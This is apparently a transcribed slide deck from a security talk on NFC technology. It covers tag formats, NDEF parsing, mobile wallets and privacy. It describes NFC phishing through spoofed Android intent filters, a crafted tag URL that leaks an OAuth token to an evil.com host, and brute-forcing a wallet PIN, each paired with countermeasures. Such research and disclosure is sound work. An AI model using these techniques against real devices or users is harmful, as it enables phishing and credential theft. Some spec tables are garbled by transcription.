Corey Benninger Max Sobell

Transcription

1 Corey Benninger Max Sobell

2 NFC Overview What is NFC? Hardware basics behind NFC Antennas and waveforms Tags and access control NFC Data Exchange Format (NDEF) NFC Application Attacks Privacy Mobile Wallets 2

3 RFID technology ISO :4 (13.56 MHz) Physical characteristics Radio frequency power and signal interface Initialization and anti-collision Transmission protocol No encryption or access control! Devices: Powered: PCD, interrogator, reader, device Unpowered: PICC, target, tag, transponder 3

4 4

5 RFID: 125 KHz/13.56 MHz/900 MHz NFC (what we ll be focusing on): A type of RFID Short range (induction v backscatter) Enough computational power to perform basic crypto 5

6 != Don t think of NFC like proximity cards Can mimic these, but often NFC is much more complex. 6

7 NFC enabled posters. 7

8 8

9 9

10 Phone Hardware Radio (ISO 14443) Phone OS Software Protocol: APDU, SNEP Data: NDEF Market Applications Foursquare, DoubleTwist, PayPal, Park Mobile, etc 10

11 Replace a traditional antenna with coils of wire Samsung Galaxy Nexus (in the battery) Samsung Nexus S 11

12 Energy one way, data two ways 12

13 Inductive Coupling Current device ranges severely limited (4-10 cm) Near Field: wavelength (~20m) much longer than antenna diameter Kristen Paget: 900 MHz read ranges > 66 meters That is not NFC NFC theoretically limited to ~10m 13

14 Encoding: ASK Reader -> Tag: Modified 100% ASK Tag -> Reader: 10% ASK Baudrates: 106 kbps, 212 kbps, 424 kbps, 848 kbps 14

15 15

16 Reader: 100% ASK Tag: 10% ASK 16

17 Each Tag has a UID unique identifier Serial number for card Locked on physical tags but not on a $80 Chinese-manufactured knock-off card Can be cloned using an emulated card More than just memory sectors Reader sends requests to read and write data from tag Tag can deny request based on access controls 17

18 Mifare Tags If you want access control, go with DESFire EV1 (for now) Tags Locked for Writing Access Control Broken Year Broken Ultralight Classic DESFire DESFire EV "Breaking Mifare DESFire MF3ICD40: Power Analysis and Templates in the Real World" by David Oswald and Christof Paar 18

19 Phone Hardware Radio (ISO 14443) Phone OS Software Protocol: APDU, SNEP Data: NDEF Market Applications Foursquare, DoubleTwist, PayPal, Park Mobile, etc 19

20 NDEF NFC Data Exchange Format Specs come from NFC Forum NDEF Message contains NDEF Record(s) Common record types Text URI 0x00 through 0x23 to map bytes to prefixes. Smart Poster Text and URIs 20

21 Decimal Hex Protocol 0 0x00 N/A. No prepending 1 0x x x x x05 tel:// 11 0x0B smb:// 12 0x0c nfs:// 13 0x0d ftp:// 27 0x1B tcpobex:// x23 0xFF RFU Section of NFCForum URI 1.0 spec 21

22 D1 01 0D B FE D1: record begin 01: length of payload length 0D: payload length 55: payload type (URI) 05: payload identifier (tel:// prefix) 2B->37: payload ( ) FE: terminal value character 22

23 Google Tags Application crash* NDEF Stack built in to Android * On Gingerbread. Java level parsing crash, not exploitable 23

24 Phone Hardware Radio (ISO 14443) Phone OS Software Protocol: APDU, SNEP Data: NDEF Market Applications Foursquare, DoubleTwist, PayPal, Park Mobile, etc 24

25 Collin Mulliner ( Python code for working with Nokia 6313 NFC and Nokia 6212 Classic Francois Kooman, Roel Verdult Using NFC to trigger bluetooth and file transfers Nick von Dadelszen - ( Kiwicon Mobile point of sales reader w/ RFIDOIT 25

26 Messing with posters Access control set? Read-only option? Physical protection? 26

27 27

28 Countermeasures Altering data Use write locking or access control Zapping/DoS??? Counterfeit tags NFC Signature Record Type Definition Technical Specification Each record is signed Issues with Franken-tags, cloning, signature-checking... White-list of UIDs Mgmt pains 28

29 Blackberry requires two clicks to open URL 29

30 Push for Zero Click NFC integration Some URIs require no user interaction Contacts, URLs, Market Beam data from device to device Pass NDEF messages instead of emulating tags Simple NDEF Exchange Protocol (SNEP) 30

31 What if the user does not need to click, only tap? 31

32 Register a detailed intent filter in the app s AndroidManifest.xml No interaction needed when scanning a URL with What prevents a malicious application from also requesting this intent? 32

33 We can craft our own icon and title for our registered intent filter Can you tell which is the real maps application? NOTE: See Android Application Records, introduced in Android 4.0 (API level 14) for countermeasure 33

34 AAR from Google: If no application can start with the AAR, go to the Android Market to download the application based on the AAR. Set Android Application Record Our application in the market Add our own tag (Bigger! On the front!) Successfully phished! 34

35 The tag: NDEF URL Record: AAR: com.porkmobile The app: Webview to our server Collect: credit cards, logins, etc Countermeasures: In Google s market 35

36 Developing an app accepting NDEF data? Treat the NDEF data as untrusted. Validate like any user supplied data. Example: Foursquare added NFC check-ins. ueid= &venuename=time% 20Square%20New%20York 36

37 VenueID was not validated to match VenueName before check-in was submitted Can t trust tag data Fixed in version: removed NFC check-in Collin NinjaCon

38 Don t blindly pass a URL (or data) from a tag What if Intent filter api.foursquare.com Your user is persistently logged in Expect But get api.foursquare.com/account/addfriend?userid=666 api.foursquare.com/redirect?domain= Is your authentication token added to the URL? 38

39 ERROR/VenueActivity(536): java.lang.illegalargumentexception: Illegal character in path at index 42: ww.evil.com?oauth_token=4cxotla50whdkoju GS4GQQ1XBINTPX5DSCFSRVARFH5YXE0O&v=

40 NFCShortcuts app on Blackberry never writes to the tags Triggers based of UID Limits the attack surface 40

41 41

42 NFC as a privacy concern? Smartphone has all the megabits anyway, right? Can be as good as GPS data Reading a UID at a specific time, may put you at a specific location Transaction data at a Point of Sales could be sensitive (you spent how much where?) Who your friends are (or what devices your friends have) 42

43 Reading an NFC tag generates an intent seen in logcat, but not recorded to file system Default Tags app Stores tag and timestamp /data/data/com.google.android.tag/databases/tags.db 43

44 Data can be left behind on tags from previous writes Make sure to zero out or format used tag NDEF terminal value character, length fields Have to read sector by sector 44

45 45

46 How do you protect credit card info on your phone from other software listening for NFC tags? droid dream like malware and other rooted applications? a stolen device? 46

47 Yo Dawg, I heard you like computers Runs a base operating system Embedded applications Simple communication interface Strong crypto and access control Pre-shared key known to the SE owner Even if your device is rooted, you won t have full access to the SE 47

48 From the NFC Antenna Be within the physical NFC range From other apps Signed with NFCR or RESE keys on BB Signed by Google* * Unless rooted device or 3 rd party SE 48

49 APDU - Application Protocol Data Unit (ISO7816-4) Defines the communication between OS applications to applets in the Secure Element BH08 - Ivan Buetler SmartCard APDU Analysis Google Wallet Example send: 00 A bytes (SELECT [default CardManager]) recv: 6F A OK 49

50 Free $10 for contactless payments Early build - lots of debug code BS Bank <- Debug Menu ViaForensics post stored data Can work on a NS 4G or NS or Galaxy Nexus (thanks XDA!) Non-root builds means signed by Google a-brave-new-wallet-first-look-at-decompiling-google-wallet/ 50

51 Zvelo team disclosed Google Wallet PIN is not stored in the secure element Physical access of the device needed for abuse On a rooted device The PIN can be brute forced (10,000 possibilities < 5 sec) 51

52 Don t trust your user-land application Keep payment secrets in the secure element Keep lockout counts in the secure element Do sensitive operations in the secure element Pin verification Treat the bus to the secure element as insecure Hidden APDUs will be found By monitoring or fuzzing 52

53 What about a Tap attack with a compromised point of sales reader? Pablos Holman s boingboing type use the reader hack 53

54 For Android: The NFC antenna in your phone is only activated when the screen is powered on * * For Google Nexus devices, although some NFC chips may work in low power or no power modes. 54

55 Blackberry w/ NFC: The default is to ALLOW card emulation when LOCKED or POWERED OFF! * * The BB Device does not appear to read or take actions on tags in locked or powered off modes 55

56 Holman s tap works to grab your own Google Wallet number if your device is on, unlocked, passcode entered, and before it times out ie: good countermeasures against IRL attacks 56

57 Positives Can disable the radio (can t turn off physical cards) GPS to find my credit card Easier to see transaction history Or current balances Gives you more security control than physical cards Device passcode 57

58 NFC: it can be another vector to mobile devices and apps Developers beware! Untrusted data! Pen-Testers: It s just getting started Questions? Thank you to: Jason IG, Stevens Our 58